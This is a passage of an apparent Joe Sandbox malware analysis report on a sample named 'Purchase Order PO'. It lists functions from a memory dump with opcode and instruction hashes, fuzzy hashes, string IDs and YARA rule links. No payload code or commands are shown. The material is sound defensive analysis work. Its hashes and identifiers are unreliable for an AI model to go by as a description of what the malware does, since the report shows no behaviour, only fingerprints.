                                                              • Instruction ID: 1073c142aed5a376dbe17be068ef2caad2291e7325b8bcfb6b238720cd6e24cf
                                                              • Opcode Fuzzy Hash: dc1dcdcf96e3a64b81dcec669dfbbb33029349fde50678894b0035709e2e7382
                                                              • Instruction Fuzzy Hash: 9951D071A047468FC764EF24C5406E7B7E4AF84310F48483EE9DA87241EB34E949DFA2
                                                              Function 00F8A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 00F8A2FB
                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 00F8A309
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                              • API String ID: 0-2876891731
                                                              • Opcode ID: b9496237fdc292fed0ccb66b6955933c1dd368f0d948a590272e75214534eb02
                                                              • Instruction ID: 4f226738d691cf62e12cbafeba513e490ce21d2e35d9b7e5b6ed04985d7c61a4
                                                              • Opcode Fuzzy Hash: b9496237fdc292fed0ccb66b6955933c1dd368f0d948a590272e75214534eb02
                                                              • Instruction Fuzzy Hash: 7741C131A04689DBEB21DF59C840BAD77B4FF84710F2440AAE804DB2A1F776DD00EB51
                                                              Function 00FBA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Cleanup Group$Threadpool!
                                                              • API String ID: 2994545307-4008356553
                                                              • Opcode ID: 31a56ae6e97afac38c3b71b91eb3dcc2cfe0b6c55b0fa669642dc7dc9e07e9bf
                                                              • Instruction ID: 8506ad988624f4a26a5b280f0554a1d7d9b53b0e3c513c287a3ec462b0fad5fb
                                                              • Opcode Fuzzy Hash: 31a56ae6e97afac38c3b71b91eb3dcc2cfe0b6c55b0fa669642dc7dc9e07e9bf
                                                              • Instruction Fuzzy Hash: D101D1B2640B40AFE311DF14CD46F5677E8E754B16F048939B649C7190EB38E908EB46
                                                              Function 00F8C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: MUI
                                                              • API String ID: 0-1339004836
                                                              • Opcode ID: 769e841bf70663ef73da04b715096819af2de544148d32189867ecadccae9a6d
                                                              • Instruction ID: 78b25383908e4cf9e11248342db96d2ad0001ae43b35e08d2d003a4f6aa94cd5
                                                              • Opcode Fuzzy Hash: 769e841bf70663ef73da04b715096819af2de544148d32189867ecadccae9a6d
                                                              • Instruction Fuzzy Hash: ED824D75E002189FDB24EFA9C880BEDB7B5FF44710F14816AE859AB391D7349D41EB90
                                                              Function 01006420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 8bde723903f237b95ae413f6a76035e6de4bce507b4bdb54f138e6fb2b4d7813
                                                              • Instruction ID: 41cb786fb4d9bf520894e1f8bbda5b7c447bd7b36b10ba81932a8d1eae5045df
                                                              • Opcode Fuzzy Hash: 8bde723903f237b95ae413f6a76035e6de4bce507b4bdb54f138e6fb2b4d7813
                                                              • Instruction Fuzzy Hash: 749162B1900619AFEB22DB94CD85FAE7BB9EF09B50F100055F600BB191D776AD00DB60
                                                              Function 0102E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 3b71fdbceeceaf10857a70cc0ccdc2f9ebee005d8070e813395fd5b9bca13ba2
                                                              • Instruction ID: fa1bf9aa893b9ba0f6eac15f840469ab693994959f751219d3e5c563abc1a979
                                                              • Opcode Fuzzy Hash: 3b71fdbceeceaf10857a70cc0ccdc2f9ebee005d8070e813395fd5b9bca13ba2
                                                              • Instruction Fuzzy Hash: C491ED32940618BEEF22EBA4DC45FEFBBB9EF85740F100029F505A7251DB399905DB90
                                                              Function 00FBA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: GlobalTags
                                                              • API String ID: 0-1106856819
                                                              • Opcode ID: 9995b826d0b0c9a7e4980c78670c4c68711ae9349ac8563a0fc410044389df73
                                                              • Instruction ID: a9db38e2ba4cfda2bfea8091ea596397f490f5c98846ff4ccb80c500520ed1a6
                                                              • Opcode Fuzzy Hash: 9995b826d0b0c9a7e4980c78670c4c68711ae9349ac8563a0fc410044389df73
                                                              • Instruction Fuzzy Hash: 6A718E76E0020A9FDF28DF98C9916EDBBB1BF58754F24812EE505E7250DB358C41EB50
                                                              Function 01024978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .mui
                                                              • API String ID: 0-1199573805
                                                              • Opcode ID: 2c0d210f39224863a0cc5e4c89915a4d13476a13e2a50981b3361ae252b6621a
                                                              • Instruction ID: fb98cafc616a24dc5dbbafea6825a736f127021e3c22d8b8bf9b190ec76fcc03
                                                              • Opcode Fuzzy Hash: 2c0d210f39224863a0cc5e4c89915a4d13476a13e2a50981b3361ae252b6621a
                                                              • Instruction Fuzzy Hash: DE517C72D002399BDF11DFA9D840AEEBBB4AF08B50F05416AFA55FB241D7789D01CBA4
                                                              Function 00F9E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: EXT-
                                                              • API String ID: 0-1948896318
                                                              • Opcode ID: e81ea86f8832ccdec8d01e33b6e9d6069c0126a4e85d90ffbf883d753e13a98c
                                                              • Instruction ID: 5cff195b5f0dec381beffda23a04087d9ea5429c652d59b1cad2791cea590842
                                                              • Opcode Fuzzy Hash: e81ea86f8832ccdec8d01e33b6e9d6069c0126a4e85d90ffbf883d753e13a98c
                                                              • Instruction Fuzzy Hash: BB41B572908301ABEB10DAB5C881B6BB7D8AF88B14F44092DF995D7181E778DD08E793
                                                              Function 00FFC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: BinaryHash
                                                              • API String ID: 0-2202222882
                                                              • Opcode ID: 04d772a07c228cb12e27ee0e0ee751fcc3ee362c7af690a0dad5acc080aaffa9
                                                              • Instruction ID: bd9fb0b6cd6758a4362ec9b636b6f51387f0ddac0e4baf3e0d24cfee676ac7bb
                                                              • Opcode Fuzzy Hash: 04d772a07c228cb12e27ee0e0ee751fcc3ee362c7af690a0dad5acc080aaffa9
                                                              • Instruction Fuzzy Hash: 2F4190B1D0023DAADB20DA60CD81FEEB77CAF44754F0045A5EB08AB151DB749E88DFA4
                                                              Function 01016B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #
                                                              • API String ID: 0-1885708031
                                                              • Opcode ID: adb8760901a3b84315134374e84f4dd3f9bde5a990dfa0d2e0a0427e2f64fd7e
                                                              • Instruction ID: c3539647eaaaec001a7549d39e4ffb53662fb2fe7ec81350767a9692f96b668b
                                                              • Opcode Fuzzy Hash: adb8760901a3b84315134374e84f4dd3f9bde5a990dfa0d2e0a0427e2f64fd7e
                                                              • Instruction Fuzzy Hash: 54310B31A0060D9AEB22DB68CC50BFE77F4DF04704F144068E981AB282C7AEE845CB50
                                                              Function 00FFCA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: BinaryName
                                                              • API String ID: 0-215506332
                                                              • Opcode ID: f66fdc2f4c2aaed5dbe8b0c536d8b587c67b53ac9360aa8d0d0a199f5cc604a7
                                                              • Instruction ID: 7ad17e704da241bdef4c2d3d7ae5b246558c8ff6b66e5929007af6a419597edf
                                                              • Opcode Fuzzy Hash: f66fdc2f4c2aaed5dbe8b0c536d8b587c67b53ac9360aa8d0d0a199f5cc604a7
                                                              • Instruction Fuzzy Hash: E131D43AD0052DAFEB15DB59CA56E7BB774EFC0720F114129AA05A72A1D7309E04E7E0
                                                              Function 0100892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0100895E
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                              • API String ID: 0-702105204
                                                              • Opcode ID: 8ee79f93aab52fdf0b74ef7b8d09d4a5db7bae2d50e6512b243ee1dc712983b1
                                                              • Instruction ID: 9fedbe1288cc6b2a3321d2e95d70b320420cde6b98b68189117935067d863e77
                                                              • Opcode Fuzzy Hash: 8ee79f93aab52fdf0b74ef7b8d09d4a5db7bae2d50e6512b243ee1dc712983b1
                                                              • Instruction Fuzzy Hash: 4001F731B002019BF6267A59DC84A9A7BA5FF86354F09002EF6C1165D2CF25AC41C797
                                                              Function 01022000 Relevance: .8, Instructions: 757COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 73b19cfdd08ba096110d0ef5005c5ee702e8555a5e224a91a38fcd35fede0f8f
                                                              • Instruction ID: c54128e7c78c0f2289e171499111e11831cc86dde2f36dbd0d23508be548d29a
                                                              • Opcode Fuzzy Hash: 73b19cfdd08ba096110d0ef5005c5ee702e8555a5e224a91a38fcd35fede0f8f
                                                              • Instruction Fuzzy Hash: CF42F3326083619FE765CFA8C890A6FBBE5BF88300F08496DFAC297251D771D945CB52
                                                              Function 01018158 Relevance: .6, Instructions: 617COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8b8f75d0730651432b499b6d230134cd406387dced2631c96a5680eb1afbcf2b
                                                              • Instruction ID: a71b59fd1d0d25e5215d98857a7e368fdf9aefc9ee8d79692449f06263dfcb31
                                                              • Opcode Fuzzy Hash: 8b8f75d0730651432b499b6d230134cd406387dced2631c96a5680eb1afbcf2b
                                                              • Instruction Fuzzy Hash: E2424175E002198FEB65CF59C841BADBBF5BF48300F14C19AE989EB245DB389A85CF50
                                                              Function 00F92840 Relevance: .6, Instructions: 605COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 24358a64819b4ddc106d178a5294110664343baa8990adb476b94c1ef4261b10
                                                              • Instruction ID: d342debf38727d10c4a1dd096ac31642c36142d4026d4088ce86f5ad966b3cae
                                                              • Opcode Fuzzy Hash: 24358a64819b4ddc106d178a5294110664343baa8990adb476b94c1ef4261b10
                                                              • Instruction Fuzzy Hash: 2B32D070A007999BDB24CF6AC8447BEBBF2BFA4354F24411DD486DB285DB35AD02EB50
                                                              Function 0102A118 Relevance: .6, Instructions: 591COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d49ea98ffee173a90bb83c99087937845ee1cc5d85addba60c4d9f29704526a5
                                                              • Instruction ID: 9f7ef831d797f55fe5ac2fb8199819efd00a56e8aaed806c45cae395b8ce6970
                                                              • Opcode Fuzzy Hash: d49ea98ffee173a90bb83c99087937845ee1cc5d85addba60c4d9f29704526a5
                                                              • Instruction Fuzzy Hash: 7F22BC70704671CBEB65CF2DC494376BBE1AF49304F18849AE9C68BA86DB35E446CB60
                                                              Function 00F86A50 Relevance: .5, Instructions: 548COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6b24f816d78183e9322673abaef0b52ddd5938542bb3cd3678582074dc97e689
                                                              • Instruction ID: d3e7d99c46322993907d1f660603a5f3d2a14ef57009a8a5d9de81b93058ff73
                                                              • Opcode Fuzzy Hash: 6b24f816d78183e9322673abaef0b52ddd5938542bb3cd3678582074dc97e689
                                                              • Instruction Fuzzy Hash: 3B328B71A01245CFDB24DFA9C880BAAB7F1FF88314F248569E956EB391D734AC41EB50
                                                              Function 00FA4A35 Relevance: .4, Instructions: 423COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                              • Instruction ID: c3eb9b4459f57d8da772eac8139ebb03d028197f38e700ac1167924a4506b3bf
                                                              • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                              • Instruction Fuzzy Hash: 63F172B1E016199BDF14CF95C980BAEB7F5BF89720F148129E905AB340E774ED42EB60
                                                              Function 0101892B Relevance: .4, Instructions: 386COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 20bf6546ca05ad7e15c6d9cdff842c4594b2b0822ca29144273ab32dd7461d7c
                                                              • Instruction ID: 27e3c0bb63a89d88889cc4e1cea594f58e4dc69431129dc01e57cfccabc77d5a
                                                              • Opcode Fuzzy Hash: 20bf6546ca05ad7e15c6d9cdff842c4594b2b0822ca29144273ab32dd7461d7c
                                                              • Instruction Fuzzy Hash: 1AD1E372A006098BDF15CF58C881AFEB7F6BF88304F18C16AD995A7245D739EA05CB50
                                                              Function 00F865D0 Relevance: .4, Instructions: 383COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2937c9889ed8e226fb18d092e8a15d0866e17b2e1b1c059106fa30c86d3ecbb0
                                                              • Instruction ID: 97ccfe8ffbcc402a79be287c79a96a92854f51cc4c9993c3d951bfb71943eb78
                                                              • Opcode Fuzzy Hash: 2937c9889ed8e226fb18d092e8a15d0866e17b2e1b1c059106fa30c86d3ecbb0
                                                              • Instruction Fuzzy Hash: C2E18D71908341CFC714DF28C490AAABBE0FF99318F15896DE999CB351EB31E905DB92
                                                              Function 00F78397 Relevance: .4, Instructions: 380COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a9138b6a43a0c6e92dcf906e9bea98b4befa1fc6e9d5e51bc29ae4b3019c3763
                                                              • Instruction ID: a95726890586cbe014426b0ea8dacd73a5ff769ebc5b0f9933a3647e3803bd57
                                                              • Opcode Fuzzy Hash: a9138b6a43a0c6e92dcf906e9bea98b4befa1fc6e9d5e51bc29ae4b3019c3763
                                                              • Instruction Fuzzy Hash: 6DD1F572A40206DBCB14DF24CC85BBE73A5BF44354F19862BF91ADB281EB34D942EB51
                                                              Function 01008243 Relevance: .3, Instructions: 322COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                              • Instruction ID: c58e90b9ba159efec749919bd1a93542d064b923191eca2fe302164951a97c03
                                                              • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                              • Instruction Fuzzy Hash: 82B16374E006059FEF66DF59C940AEBBBF9BF84304F10846EAA82977D1DA35E905CB10
                                                              Function 00F90535 Relevance: .3, Instructions: 300COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                              • Instruction ID: 8c04a02c0d77efb512e1641c06ab9d1de8e3c272756a1a6817cccc42fde78d93
                                                              • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                              • Instruction Fuzzy Hash: 12B12832A00686AFEF11CBA5C850BBEB7F6AF84710F254169E552D7281DB34ED41FB90
                                                              Function 00F883C0 Relevance: .3, Instructions: 281COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7e57a4b01d5540bf0c490d7ecc01adca533218abb409f60dc80b0dad4ad8b10f
                                                              • Instruction ID: f223e48c4314749a8d21978391ae36dc92d593c622972de517a3d568699c2578
                                                              • Opcode Fuzzy Hash: 7e57a4b01d5540bf0c490d7ecc01adca533218abb409f60dc80b0dad4ad8b10f
                                                              • Instruction Fuzzy Hash: 8DC19974508381CFD760DF19C884BABB7E4BF88354F44492DE9898B290DB74E909DF92
                                                              Function 00F7C427 Relevance: .3, Instructions: 280COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ba1b7af42d2d81d7d4d97eb313d43ab7ff83fefbf78f177e329c88ce46779ef3
                                                              • Instruction ID: 3d9eaf8a667e47d26422df6ab9b2798f9ef106b028c75a8863f26492f0ff2683
                                                              • Opcode Fuzzy Hash: ba1b7af42d2d81d7d4d97eb313d43ab7ff83fefbf78f177e329c88ce46779ef3
                                                              • Instruction Fuzzy Hash: E4B17070A002658BDB24CF54C890BA9B3B2AF44710F14C5EED44EE7281EB35AD85DB66
                                                              Function 00FAE5E7 Relevance: .3, Instructions: 278COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a26319c8e6149d4ca780324481346f08d68e61925358adb97fe411b61c981c7f
                                                              • Instruction ID: 2f2c415865c2158f1bffab5cc46da46c4b61e34d9a7477aa2d565b09f0bd214f
                                                              • Opcode Fuzzy Hash: a26319c8e6149d4ca780324481346f08d68e61925358adb97fe411b61c981c7f
                                                              • Instruction Fuzzy Hash: 76A15772E006999FEB21DB59CC44FAEB7B4EF06720F240125E950AB2D0D7789D44EBD1
                                                              Function 00FC0185 Relevance: .3, Instructions: 276COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7a8253b0a9ae35157b9586811c3cef498b5d77e363430fd12d44126ccc85d3dd
                                                              • Instruction ID: b7ab50989cc4c6949b6b1fea41b5270964ded22ff2bcdee583a0e8b53dedef86
                                                              • Opcode Fuzzy Hash: 7a8253b0a9ae35157b9586811c3cef498b5d77e363430fd12d44126ccc85d3dd
                                                              • Instruction Fuzzy Hash: 5CA1B171F0061ADBDB24DF65CA92BBAB3A1FF54324F10402DEA45D7291DB78E812EB50
                                                              Function 01054500 Relevance: .3, Instructions: 275COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 82aaf07225bd34b8ceaef46bb3356803558925780d0242b08eaeb65fb231a503
                                                              • Instruction ID: e4946dee29a1c64f3eb64e01393065cd0c9b87585b75b727af70b0891040828d
                                                              • Opcode Fuzzy Hash: 82aaf07225bd34b8ceaef46bb3356803558925780d0242b08eaeb65fb231a503
                                                              • Instruction Fuzzy Hash: 66A10172900601AFD791DF18CD81BAABBE9FF48704F450568F985DB212E335ED40CB91
                                                              Function 010060E0 Relevance: .3, Instructions: 264COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 10342134a7db4460c9fcc306e47befb3e15fdd75a43e4b749730b134af0d38ad
                                                              • Instruction ID: 88238ffe5f85c909e249c580a54fbb6e0ce12cd4ea0522afd47d5107700b19fd
                                                              • Opcode Fuzzy Hash: 10342134a7db4460c9fcc306e47befb3e15fdd75a43e4b749730b134af0d38ad
                                                              • Instruction Fuzzy Hash: 8291C471D00615AFEF16CFA8DC90BBEBBB6AF48710F144169E640EB381D776D9109BA0
                                                              Function 00F9E3F0 Relevance: .3, Instructions: 261COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9a36348444806c0a7be3d0933dd3af5da1bdf994fb9d2492bc079a679a136120
                                                              • Instruction ID: d536442a8a7d95c857fac687da16333747ebddaae58ce53a423f30a0ef5e0585
                                                              • Opcode Fuzzy Hash: 9a36348444806c0a7be3d0933dd3af5da1bdf994fb9d2492bc079a679a136120
                                                              • Instruction Fuzzy Hash: C8915636E00655DBFF24DB29C840BBE77A1EF84724F194069E805DB391E638DD01E761
                                                              Function 00FD6ACC Relevance: .2, Instructions: 226COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
